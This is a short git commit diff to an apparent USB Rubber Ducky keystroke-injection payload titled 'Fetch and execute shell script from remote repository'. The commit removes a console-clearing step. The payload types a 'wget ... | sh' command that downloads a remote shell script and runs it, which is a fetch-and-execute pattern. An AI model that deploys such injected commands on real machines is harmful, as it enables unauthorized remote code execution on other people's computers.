don't clear console after running the script
This commit is contained in:
parent
cbef4b08c2
commit
0ea8ddf39a
|
@ -4,6 +4,6 @@ REM DESCRIPTION Fetch and execute shell script from remote repository
|
||||||
REM VERSION 1.0
|
REM VERSION 1.0
|
||||||
|
|
||||||
DELAY 200
|
DELAY 200
|
||||||
STRING wget -qO https://git.sajenim.dev/jasmine/ducky-payloads/raw/branch/master/bin/hello_world.sh | sh && clear
|
STRING wget -qO https://git.sajenim.dev/jasmine/ducky-payloads/raw/branch/master/bin/hello_world.sh | sh
|
||||||
ENTER
|
ENTER
|
||||||
|
|
||||||
|
|
Loading…
Reference in a new issue